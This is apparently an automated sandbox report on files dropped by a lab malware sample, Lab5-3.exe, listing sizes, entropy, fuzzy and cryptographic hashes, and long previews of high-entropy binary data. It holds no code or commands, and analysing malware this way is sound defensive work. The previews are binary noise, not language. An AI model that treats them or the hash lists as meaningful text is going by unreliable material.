                                                                                                          Preview:DF...Z.1g.{...........A[..U#.......#._v....-..?Y..V...}..D.5SH..2...?.......9z..'..TF......x....}....._.....T?6"s.$Mk.....$,...G..u8@.g.y....3..M...;..i....p.G...m...+.4.m....E^.e....H..;7.@..^...J%...2.Cb;.t...6Q.........X_ .*.8...dz.v.+.xK...?....t5...UA...AY..#%z.L.....Q.....5..^q..^i.Ay...b)..e..d...q...a0.C.....q..<Q.x.N.i8.j..+.3m0.g.!OH.]....13..s...M....l2-.~.....o...o.L..^3>.z.).....8}.C#.j....sq..T8..X.#.$1.&.5R..."Dv.x.p...S.F.4g.`.su..xV0......&..C......;.@......."..j:...^..k.....L...._..F~vg@t$..QJ..s....-I.(["g.....$.^...Wm....k.$VYA.B.A.O....>...4.#....B........R.....n..,.V"........N.V...h....H!.c..=.2..0.3.C...Q..~...i...&;.O.T.3D.N.J..(...D..nF@.;.o..~.d..z.=.5..B..?..uF.H.<$.4|..#Q...v.a.O].....2..n8]'D^....(.l..w...~?R...\U...fU....M#,&?..^.uj.T2.!].)..P.>........@.?.].W..1!%)..$..Z.ds......{.XR..s.m.T....v.I.a.w!@..k............D@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1840
                                                                                                          Entropy (8bit):7.901575256624181
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kLOste/PQ0xGoHfUTid3hBaUoSGFcmeykEdEElU92i:kLOst4QWeGx0uKeY2ElUJ
                                                                                                          MD5:59EED261C390A8B4F39F692B5B221266
                                                                                                          SHA1:B3D20C80E69F2A7BC012E5AD4622A7FCB6402D74
                                                                                                          SHA-256:34A986BE7C371E2C33FBC5C693DE92CA34C472C4CAB09CAEC4CFFC61DBACE59D
                                                                                                          SHA-512:A6B3BEEF15FA5A1E1AA84EBFF8EEB00FD9C5318F0A7B824E69CB9ECA3CE8AFB629F2704EAFC1F178A7ECFBA2A513044E4AB176512DC79665729BDCA4A371DAFA
                                                                                                          Malicious:false
                                                                                                          Preview:.S.^l...Q.~*.?.a.._...u.J.....}..j....z.......r.x..<.......(.....CH...g.....D....j.a?Iu.V.....F$."q../N...rDD(......p..m_......a.Y.1.e.C.\.8..H..9.....~i.._...[........m..Q~.Apa...@.O\.!..ec.w'y..p.x.|Q......k..P|..#.=....L.d....^..S..Oq.)R..<.fy...`.kT06.y.M.V'.6......R....!.+.-.L.=.wZ........z...Jig...\y.6X..4.#.]...4.#.|c..,...`s.T...h..wa.B\....(.%-."....V..Y..8).T.xp.R!H.[.,...C.I.KZ`.Y.{:......:.p.Yde........`..9.zj..:p.>\.A..V....i...8...x.^.W..d....%PD..Ma>8.H....me..a...CC.A$B=Y.y.r.....B....39R*.=^...#...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.9085338891792
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uq2fp7DNiSrrI/HfUTid3hBaUoSGFcmeykEdEElU92i:uXR7lDGx0uKeY2ElUJ
                                                                                                          MD5:DD42FB9BAC9908993C61D72ADA9401BA
                                                                                                          SHA1:37A715F7299B4923226438C0FE154FA7F34321FA
                                                                                                          SHA-256:F5B8EA685DC9100B26338AAD425F28B3ECF3EBC88799781762937A945D4A40B2
                                                                                                          SHA-512:AADB0DF0F2F2F29A3361E28061FEF55E332182204145F3ACC02231F698D290D08C2EE6802CBCB47474421FF351683612E9D6E940F2D931FB53685EE3A5667611
                                                                                                          Malicious:false
                                                                                                          Preview:.r\1.Ll..3.ir..]8o....O......}.3....P@Ze.}.p.a)..n...qs*..Z:R(....L....2....4m...v.9.`....]..-...b....fuZ.3.%ro1+[Z....S:. .....}.@I.}..*5...9.}.gq.HVy.8....~.....B.U....<...R.ZRX.K....y9...Q2_...+..gY2...%.........3j.....3H....%!..%"v.....?.....W..W`_E..A.%...~..Vs%._D...+-U.i,q......CB....?}..6z8.]jC..B\}=,[.H@..FP.R....j...E.....%...z@nU6....x0(...P.w......oN.?kM...@....1.>..'c~..o..u{.....VAd(.H.vCwV0.1s...:m.........r.Q.....X.f...%..Jp..I[..-.`C.$...YSr.]..........4.>.+...=.....i..F.G....7i....f.&h{...?9.\.'.._...3T..=kB.!3..?n ..{v.k....:....A..p..Q......3..,.K..)s.\h.P.....ye.t....C.|.5..$<5uC..".0......C.DM1W.R..}.C.).V.....Y(....%.,S5.\..mR....M..^++..]I.......b0.W./gt...y...;..%R..bh..Y..kh.H)...k.-~..E...p....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2192
                                                                                                          Entropy (8bit):7.912985203375937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hmofXoLQqFRG/xH2h/Yc43eHfUTid3hBaUoSGFcmeykEdEElU92i:htoLQyQYh6Gx0uKeY2ElUJ
                                                                                                          MD5:E000C89F6598AB4E71A09B994437D9BB
                                                                                                          SHA1:9A77319ECFAA77DDB9938E9D5E98F7880A6A5BD3
                                                                                                          SHA-256:4E12BEADF9FBB602D7F50FCADF6AEF62840A7CF93666AB46DD91E7CA2236DA2E
                                                                                                          SHA-512:D042B2E9A304434095F826FDC8D38E2D2E3AE9C1A19F7F2E1701A6379FD5658654A6C3D51A9E5A07C37869DA347AE8F3D9A3305E6A424261417B0411EE32DF3E
                                                                                                          Malicious:false
                                                                                                          Preview:\..}...i:@v?....~.8..|h0?...0P.m.zJ...{np....m.LI..n...../.].K.}..3.@....J..........3.P.^g<K..i.h.~..{.~>.[...g......>..}..$u...~ CeX.T8.n..x@.U..zH...@=0...j.....?.@.L.3.vu....%.|..?...Z=........q...,.}@......I"...a.x......DEF)6E..n+.j.._.i..s..,:.U>.B..Q.X.+...G.oP.....,.8..M..s.._E...GE_.[..`...[..N.[4..%..H.}/.V..;..?F7..u#l.......B.......q...DJ^........?.......t~G.../<.!b.6Y.\.....Z....D.......[|...c...t...6g.....H....(.Nw.0...1...x....o.T..F.L:....0...M.[-...S95.&q4.h...d..Dv.)q~.M^...i..|$...t.[..n.....B.....8B......p..Cs.ZrZ.....:P.....[....mO.P....|R.fZ.P....I.j....j....]-'Wc..U@....\....Gj2...0.G....n.C]X.>B.......7-...I!.............tu...>|(.H..xN.Q....jD%....IN]u+, ....'..Yf........."?......Q.]O..S....D Br}^3....m+...pQ.....k...<...":....BL.0..@I}.....?.P..Lc.....5y.YB..r....Q.Q.?........o.U..U..........$9..Qe.o..._....X__......v..c...e.DR..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.H
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.9269667814156595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HNGYjbLVz+/D8wW7d3sp7+FQ/bHfUTid3hBaUoSGFcmeykEdEElU92i:HY66/1WNsQuAGx0uKeY2ElUJ
                                                                                                          MD5:FA63C271B846062FF54B96C7136D84F6
                                                                                                          SHA1:7D53F0835F12280BD47AB387050FD7303578D3EA
                                                                                                          SHA-256:ACEC9498736F526679B0B4A60D3B3E1250EDBCD1A9B184FD1955C3BE4F0BBC36
                                                                                                          SHA-512:7CDE7D13BB06B6B86D9B1C221E87D183A902564968EC4E783C885006D668993480159BA56E92C811F5258B17E5DEE8969ABBD6D886D3425938BC4652A55D15EC
                                                                                                          Malicious:false
                                                                                                          Preview:...<f.....`.z.8r`..MU.wYU...?.f.......u..6+h.G/.Y_.oj=..Vl..!....i.*.t..C.^.9.gt...ke!.s.4.W...q.. .)..T...>.b.S)>....J..U...}..>.....z...D.nYK..P`%.[].....*....{&......w.}.(-...T..;...K......*..)...[.~.......%.7..X...........`=..._.y;...k.......$l..SFB9uh.*..nZ.........{..i@MVVU.[.7..n.QHYTF...e..wK...NC....ua.....V1f...B.Z.~5...<T..g...:...7..`W...mP.Fo>.'....|s*..;..T.....0 2Y..-;..%.......k....Y>4.w..Rm.....Reb.l.. X..,...8Z.....L..y...6.!.n|w....wN....o...N49.z.lua....s...n."..HP.`}nO.$.y....7%...$...xaC-........}.I...x.z...!v#...=..4=..f.... ...\*..9...........g...@r.R.{..yJ..7j..4+&...|..8'ta.8.8.:."..O..]...e.+.I..0.....8...........*"..lBE...J..s...Q.g.K.7.E*6...k9.`....n..~.xPD.#.......%9.b.,.efi.....8....w.#.n..$...C...J}...VH..........(. x..r.o;m.m=l.6S..-...kl..fz.}[...>....v..]./u.azR..B............|....4../r..;M..B....<N......H.d|....j...:..3.s.t).3CT7..(...&..2_^J;V.....`#..l3C.."*.~...S.#.....k.Ig[F{.1A....p;snF~j..w._nHu.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2224
                                                                                                          Entropy (8bit):7.914918482817263
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Jz3JQt70kiBiGk0seTEJaIkTn5NNHfUTid3hBaUoSGFcmeykEdEElU92i:JU70kirk0seYhyNmGx0uKeY2ElUJ
                                                                                                          MD5:60C1FFB046A271A657F79083BABAABF7
                                                                                                          SHA1:D33F2F5A05F7FE361A23741BAEAA727CB415AB9A
                                                                                                          SHA-256:F96F1362B2D73C7026D4D80130750495468C5366501120B931F256367FD97D45
                                                                                                          SHA-512:031111C5CC5FE2EC68AC2DB276DC9381AACA45A22E0A6451AB9EA529EBB7B30C41F7A9C3BDE86E1E8A1385DCA4AD76BA583103114087F1BBFA455D625BA68CB3
                                                                                                          Malicious:false
                                                                                                          Preview:+.t.}d...[6k...:}.v%.@..i...ii.2L..9....~s......hv.....q...4..)..U...h.(9...:.S.n.G....Um3..../..tW.<._.yhk.......t.4..[..J=..W.k.1....}..c.e.{.4.$.cE..^9..dPs{.=...t...QD.kn.i......^.<..H.|...}V"j...y...-<..H.#..J......8.u.|...1('..s.le.TJ.T....W...^..X3&.T.1..A.,.......J...xqJ..8$....M...M.bC{{.TA.Ya+..h~,......G...<v-D.m.'.L...500B...V.l.`.?.L..E....:.i......x.........qa.]._j.....P.zP.v.=...p..&T.~.......kCC...@BS.{.+.<5.@j...v....k.3~~.J.......P(..{...X.?.dM6...O...).r.........)..vdg:.4W'q.`.B*...(.TS;.......9k..HM._.&.I=$l!...g.....8.,.z78K.S.&..HQ.U.lP.8.7M.D..To.S.....<..U.......6Fd.a.Y....q...n.&....WJ...Z.Ayy`F......-..0~.u!eD[.g7Sf..}..-;..`.]U...[...m.T.K...C..au.j...dvO.Wwm...h.5r.|n+.@.....@.w........$1.V....*.5.......e.88.JnCf[..K.."....(.(.~"...g.OsQ&y...1.Gfj..Y.V%.~..0e.........t.1.-.....Q.h..Y.T..4#z...(-].({...E..C.;1..[..'.p^..V.....F4.f..[ab.).C.0..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2224
                                                                                                          Entropy (8bit):7.919566936339177
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9FKWCNRRAYhcM22B+NA0rMRHfUTid3hBaUoSGFcmeykEdEElU92i:O/hcM21NAGMSGx0uKeY2ElUJ
                                                                                                          MD5:2A836CE8D2AF1291FA73F437B5C75892
                                                                                                          SHA1:0428208DDF42C367E6D953F7FF860676DD8AB5B5
                                                                                                          SHA-256:D26A228E1E1E1E294A3119C48CB738DBEE54871A460B567A88F4B3E62C6DA267
                                                                                                          SHA-512:5F2FA2D2DDA5B11ED7ADE6200D8F4B3949612BFD3EC283A55B8111E3C3E36F49E02621DBECAE9E0AA7FB39B11FFA8EB2E82A6A6370B71DFC6D69A2B7A1BE1C40
                                                                                                          Malicious:false
                                                                                                          Preview:}....i..<".q.2~.....K..s-g"M.....t2#..yo.]PM.....,.Og..Ux]>.....5.A..q.O..j...:;.,pe.<v..9,......A h.%*B.........L.j..C%.]Gp$l...Jt>......E..l.<..y.D...S...2m. h..3fy.$...+.\....%...^.5.}..q.{...(...w.B.....t...#.T.........K{D..&,...o..2p*R...je..2v..m....a.F..M..^5...a.g.........u.Wp......:.j.F...'....7...9..ni./.n....Q.....c....S.Y#.8....'.mx.b..1GV.....N.t.%?..2fc...Ava. .s=....k.8..xN.$..l9h.*W....|....5 FE..b?...fW ..b..ve..z.@5E)..h.bM......D............[9.M..J.J..f<.......j..z,A0L..L....p..(......+...1x)......cg..^.\V.|.H.`Z.R5........ .+.M"..0....8Q.Y..?f.6....]....Z...x...q.n..M3.Q..E.r.*..O..I)O.\.{y>?.....n.`Pt.r..yZ..yB...uT.~.?..........z...m......"sUq/$......`.W....C.@Lm!,.xQ<`...1...\.C.[....G...\?......k\....h|.I.*..4..]..3.Qf:h...].A.k1.^A.....7f0.7_.k.?>..A....'J....:.#..3e./.\).+. A.8.s.\.!.Nc.6[...4.N%p.... W. u.W.v....v.".A..SZ.....83...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2144
                                                                                                          Entropy (8bit):7.9151021234521615
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1Hdn4sCUpJHrHfUTid3hBaUoSGFcmeykEdEElU92i:1Hdn4InYGx0uKeY2ElUJ
                                                                                                          MD5:7DB5335D9B4728780B99B6181DC879D5
                                                                                                          SHA1:8BDC6EAC327DAFFF18D19B84ACCF3387F6CB890A
                                                                                                          SHA-256:3370BDFC099372BEF7AA5CB3477C0C81F1E9BE894E8A654D6D7569066EFE3C97
                                                                                                          SHA-512:DA936AC663863FFFD7E39F1B5445E78598C65BFECF9D77D95E23A06EBA02727970BA0A96F136732D1B4BD2C91471AC14DAED42FFAE40E44B5DED3666E1B5136D
                                                                                                          Malicious:false
                                                                                                          Preview:...}.j._G.q...cg...7?..@..X.!l!A......mnn......1J..Q..Z .zv...$PF.~..l1..%.;H#..j.....#O.\..TRd.\.l...@|..W;.......JP.?#...30.#Jv\.X.p...? .E=......+.mf=....r.....!..I.t~.......O...c.P..}....z..;..?...id-'...'B..vY..../(..Ht..Fk....\...8m.<.!x.0C!e'V(.. ............*....uZ,..!@-...#...X..(qk.....Y..E..s...s.P..+..7)..I.#? .b...K.D(9.Mxt.c.r...........7...0`....#........tf.I^#|.-.A.d1..?s0...gL.r;...hqy.....E...\..w_.....O>P...:o.>-?.p.bE"..._|...L.K.`.w.....a0.......8.}`. .....X=.G..:.`...2......kS.........mz..E .,_.".qM|.P..L2../.%V.....I.&-1.b.6....pu...D.\.....T.w....Rm./fQ<...'.v...9.z.(.....=...)....25\u..d.r77..d....8...J......|Q.BK....n.......%f....s...\z_q=F......Y..RP.8r5g......o.g..|...k#_qt..^}.<^...........8..:...}L..j(y.WqnJ.U...iM...:b.........).E4....'.....$X....\.9K.A].....q.c>(y..!..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2144
                                                                                                          Entropy (8bit):7.913972132949728
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:33cS2rp7r2HfUTid3hBaUoSGFcmeykEdEElU92i:3s7ZNGx0uKeY2ElUJ
                                                                                                          MD5:9EEBFA0A5751271B1AF909C448A0E056
                                                                                                          SHA1:D47BA3BFAF949AA98C88E6A2AC03D4A05EFBFC15
                                                                                                          SHA-256:00236DD732D48F2BCAB2D4BF204DE5CD729DF8FA47F1BE7BC37F91E1F6862F75
                                                                                                          SHA-512:A5F86D8770EF34A8D392B7A6BC3923BD8DFC207E10546892CD81CD1D4CD962495A53B695CDBA48645C14470EEF3B9C1EE62B1C1C8661E64D9966ABEAF4B1E605
                                                                                                          Malicious:false
                                                                                                          Preview:c=.G..-.}....;.8.......a......./t...'!..|c.*#.....S.RZ..j..)...4...fP=e.@#....A..3_mP.P.....O...!.U2S..4;]V.H.3N.....)W:..tl...........{..$.7]...]8..:...l.D..o....O.A........=.\.w..CbKy...tP.w.'B....I..d.......H.$.N*.b.....M..9..zU.._.....!...D.....a.[..hu...%..U.&...-....s..6.bY...n$p...Y.$.~x.....{..1../.rx.n.k}:>.u.J@......wT....B..........o.*p.....B<\X4.............X{\...5.qy...c.).f=.....jmc(.L~#...-8.1..,c.4[.j......0Ox..ji(...7!.YC.0..n........E......V.n.?~..}..B.7`Po...;~..#=j.A..>.r5+QFw.@.$...<b.w...,......,IL.....3D..my..i...RB..s.1.W.knC)......j.Jl....$. ....C.7..g..GJ;m...cf..e.`...}C..7...{.Z..j.....m.d.dN..*._{.#.........].{..........%t#.>@K..Ol$@Q...mXk..J..#5.......3.......)...m..&LrG.... .HP.q.*...{e...../+.NQ...Y.C..]T[.B..3.4..PS#;j:......DO...._/.S....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2144
                                                                                                          Entropy (8bit):7.917144749167465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:We0ZthVtQIK1Thk0va8xw1vrHfUTid3hBaUoSGFcmeykEdEElU92i:WeOtf219k0CT4Gx0uKeY2ElUJ
                                                                                                          MD5:D99F3AD42A54283A6E6CE1F5F03787A7
                                                                                                          SHA1:8BADBE57BB14806195F1786CF6D20D192BDF8C77
                                                                                                          SHA-256:05520520AEEDA0F4DCB58FCB8C3D6AE20F42D60D2ADC94E81529E132459D4FA1
                                                                                                          SHA-512:0ED1FFEACA91B831586BBEE2F81ABAB16CAA1A1B98160DDE234AA0A36A74AB6CB87A84E8183BFD6FEDE5FA4AFAE54E9451BF3919CCDC114E138A9E9780917A91
                                                                                                          Malicious:false
                                                                                                          Preview:..s2J..pP.j.....\..x....dS.f.8....2)..".Ky.b..9..4W.G....B..c....}t..\.6^<:.u..5..w..O>J.....%.-w.!....=.....E..1c\,...%.>...E.]..h..3...m....s...h[.,%\...n.y.1OO..94.....;..g>....P`w....N..O..P..ymYx...x....4w."..f.YpB..7o.-D..4L.....$...0.....8....0..h..Z.0b..zC35.."....I..r...x...P.|..*.[dL.oZ.X..`pr[. ....E....iz.YjDz.+.......".....m..W.}WSQ.\...&.?MH...jR.e.}....m..)..V....K}........R.0&.&.7.P...9.}.....J.D......i..E.(.x.....'8$... ..D..9..... .....!...3.....C...>.q.m.t...<"...#......Y.SS.].....D.........^.q.q..Rg.Y..[.J...../......0...Y.....9aE.r.:K.02...`.K"..\"...m^..8.w.-O.D{.e/...!0.,....ES...w...r.......((.<..o.G...f.%.T.:6?..&.aDPd...._.6.f.J.~..Uhs..I-~.....u.t0a"........"..=1...-...3.o.q.V....S..Z.*(...._..]5..Q.(P?.dM..B...K.g!Oo.H&.......5.B)..x..d.9b/.tbX...u{.{.e....F....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.9368279660875185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:C0YgGcu5lm+U8XkJYMGpTFfmPtOR9zdiYPYHfUTid3hBaUoSGFcmeykEdEElU92i:bYkWlX2qTFfmPOhikGx0uKeY2ElUJ
                                                                                                          MD5:E789AFC974F9613F8AFA928BFE259B5D
                                                                                                          SHA1:86DB02A25C3AD2EB647D7836B083B63D37594685
                                                                                                          SHA-256:D159FD5B2462AAB7B6D325B88D476E0D91CDD3F8E12299D3A898A00D00F41DD8
                                                                                                          SHA-512:E4D00FE2085F833CFB9BBBACE05CBFFECC612481B30A0A1640227E6BE64E3428AFAAC9E378CC7B6E88C303F8C39CADBB3856DFFBBE0A66AEE9E97016FAB27884
                                                                                                          Malicious:false
                                                                                                          Preview:#5hh.... A..a.foW....f.c......QD\w".4..i........%.x....6..hb.....$i....%...5T.....BT.F.HX...a..d..;N.f+.....!.r.A.+....?....c.Mc...v.0. .,..4U..1..po.._..|X.i...@.*TC.$.k=3g..Vv..[.G^...3..DY..i...w.a...5..\.....'...$G.9._..h8.NI..inK.ZR...........:...a.S.....2F.v.......U..I.^"4..."]...v..3.Md...+...Ow.L.B1.+..6.p..A.#VH.I.....y..;.=&..................n..6........[.CS..........;......;a........]~...i....8qMcds.y.|}%2...7.....a?..j.xt.....o.>.|...!#...L..b.sYeUiI..4.....Y;.y.Y;........G...>.e..C..m$KR.'%..yb.q?.....\dsZ.^...dQ...tr.........#...l...y.CO...G.^.2N..[.....EH.s.3.....G..c....t.S....rw].'..>e.\.n..k$.L.........[...D..r.T..d.bU...!5k..9t.L.........6..8.o.......9GY.L..<...I....~..\......']:./..Co.QYI.C...y.f.4..Y.}.n.$.C_o....."..X.q.C..%.d....2.^..[......)...........<:F........@>.y..-.}T.Y...S..9..a;2h........l.....\U.$.."....s.g..E......%L.,GLQ.kNWI...?....K....Z|.+..?.{..6#H`J|.C....,.w...u.....`{.W.A...K..s.....5..".4tL..G.hA.S..A.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.911981781270612
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:28+FpEEhmc4L/yuuHfUTid3hBaUoSGFcmeykEdEElU92i:pOEol+Gx0uKeY2ElUJ
                                                                                                          MD5:9AFF0C5EC4A37AD5CAEEA40CDF40CCE4
                                                                                                          SHA1:7AA244DC7315515156DD01194728817108975BD6
                                                                                                          SHA-256:74C18F8601E3D239ACEE6DC3BF060A1C677A716EF74C7345C4E2E5049214E427
                                                                                                          SHA-512:E2F12263E14FF119FEF1E1E84DBBA6D19B59F17A8944223280ED8E493F84EC2CB2F682189B50D61D838A226F3DEF6A28108703C704A63850EC78F7C612F5C3C8
                                                                                                          Malicious:false
                                                                                                          Preview:......B..T....f.K.47..mmps.{..{...n..:....$$.BE......!.!`....KYe.y.w..8BIZ.n.c..s'w.o...7.......R...||...=...T.-..`...[7.L.V._....>q\........`}.......J.....zJkm.Af...._..g...C.....Z..?K;.h>...W^.@xh ..E..l....r..kz...u3.^.K.no.B.&._.I?)..LX&.N.~L{..e............3^......d..7F...;...-.;._..C...f...U.u...Z.P.?.QB.2m..8f..hSVZ}3<v*.&3.E?{...I......d8.'....*..4...E...../..i#..~o/.-z=1.X..'[....}....E...(.n;..M.2......._.#hm-..|....#...-.@.,....Ss4.0..R..Z.M.I.L........+.L/.........[..@.~.............#..\...6.Z..$N.%4.}......d.tF.#...XZ...=.H..P4...U.._...`^.......-... Y..\..vF.3.P\B...>....1Y.>.1M.#8.h....d..n.....-'..t.@.O.e..yX..Y....5$.A..9.w%..@..B..M;..OU..YM.4~..e.c.^.S............q...R.l..F.Y.U].8.Q...4<..6+....Y.&h..QQ.........5{#...].].D{.....=.A..;...T...Okh.y.|R..n..N.X...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.932045937076
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Y5vEkJoTebVC4GGl5vBSqu9rRQTcf2HfUTid3hBaUoSGFcmeykEdEElU92i:Y1Ek8qVC4GGlHSPycBGx0uKeY2ElUJ
                                                                                                          MD5:74B14D33FFC1DC76490081FBBD855B67
                                                                                                          SHA1:6127AC47F661BFCC10E55DF0C2BC415BD6D9F1C3
                                                                                                          SHA-256:4A7AE951738B9C439F2E7C61972056432AD735C74964117512CF337F33A817CD
                                                                                                          SHA-512:D68D84B165E25705A353BCA4966FBE6EE874941D964E67EE4EAE797197557248C20D91EC5A08679B5187D6D2DD63B72D90E2E2386FB36CF9B888C6107D39DB0F
                                                                                                          Malicious:false
                                                                                                          Preview:.....V....YC.Q.XV./.M.....e....mZ.R.m.(...~..|.VG2YPK.B...evhv rv.I.......d....\o..FI7\.c-...F....64.,..vY>..?Z.........J.F.`...Z..#...!0...M.R+.;j.k\.S..LP.W.u.s...A9.J./... 9{.$..t.u..^.U".........}......>1..K(...@.u...g.B....d)rV2>yf....!-..F..G,.s....x,..Sp0Q...,"E5...~.........f..L.OV[.M4.j....0...(..,...@..G.J..O.j.{..G..20.../.\...8..Q......'....J..yBm..}...Q.1...QR<....AU.........sJ.!..G"r.k..51... 7.j...n..o.J.y@....9...<P..s;. .....;.!..b]s..g"..Ar.,.Y.._Q..x....x..|Q.=....*.p...r...o.n......i.Z+.,..?...b.........a..c...?...t.....t.....x@.A6...=c...?...i..q.t>\.H..........C+BI...s.ST...L...g...u.ia.V...*.F..%.....NE..........^W...id......1..>.k*..0....~/.7.......VAzH.jg:@..g...Y..{H..8~c....K+i.i..O].w........p.e.ND.w..q71.FgO3I......A........I...5C...HJ....o..:.....e.\.......#q> OoXqL.....j(...._..YT..K.1.....T.+...eu...R]s.T.h......4.Z.c.(.,O...b..JP........vd.......n..C..No.g`..I.b.-...<.......6.....|hS.d.Qj
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.922121919308111
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uEITeMBgffOzHOqX+0UZMqa+ptFFtGOzAAhouxNvHfUTid3hBaUoSGFcmeykEdEb:PISMBgYzXXUE+7tGOzAKokWGx0uKeY2b
                                                                                                          MD5:C9986A5EAEC3AB7821E2917FA5454E8D
                                                                                                          SHA1:AF0699E0603F938394A02E8563D3A0A4BD545279
                                                                                                          SHA-256:326DCE1D44AC80A6A3824413D9F331A0E42DDCCB7C9E7A7C59F918E2D7C5D702
                                                                                                          SHA-512:473FF191ED0C351282138393B82291FEB98A9EEF867A3F62811CD38282E3D3C5924A57AD748F871D4BBBE57B2BBE900D97C0DF387447C58AEE156BFDA43FAB21
                                                                                                          Malicious:false
                                                                                                          Preview:.V.|.j}.(.F..i.n.k......Bj..............SAb.....wY...&s...5*L..\...T.O".+L1.....-B.g....W_...p....s...h..|....H"{b...s...b$...HO...;..w.#..u...`t=v.r3..y.ggL..(?.T.......c.........&..d...N%2J..ay.-.:..4.0.5O.W.......s.i....V./.........."..h..........e....:._.._ej.!y?....Y....!#uD.....r......!a.....R.)..An.M'H_.k.....yc...'.p.7.+(.V..V..."....F....A..F..H.c..r?...Z6..Q.8..=@.. ..|.~. n.........lZ..CV..."...+.........E....Hw..I.9F.Z.v.E..Y.K.G1D.P.U..].NxI\.=^.^.j.1.a-p%~@.L~...e. *r%...3....+..V....6.'.?...r.a......N/.....H..&.&.b.=...0.h.pi.....j......G.............M-S:0/@..t..i...#...TY.j...B.......-Vhs.}&S.4.5Su'....'..Mn1. n......." p.....T..%...|q..y2RW.9.M.0:nt?...$.....w.n...`....J.._../g............;!.R.@en/G=|[.E.G|..@.E.R...)c....=HVQ._..b.<.......b....^:....x.5kd.d.YS.l...;.t.....Uj5.m.Qf.Do."6......*..<E'.c..S.=(..)..Fx.+.j.e.j.;.g......mq.W9l0...yB..........>....g+._Bb...Y...Pu.....}K|J......A.njH..O.........y.O...p..&..,.C.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18224
                                                                                                          Entropy (8bit):7.989362470913696
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:MWZuxFB5n48RXGmr/QXRoXf7oFZiUSb5DButlyuPafjtb:VuxFT48Rnr/QgTSiUSPgyuPyZ
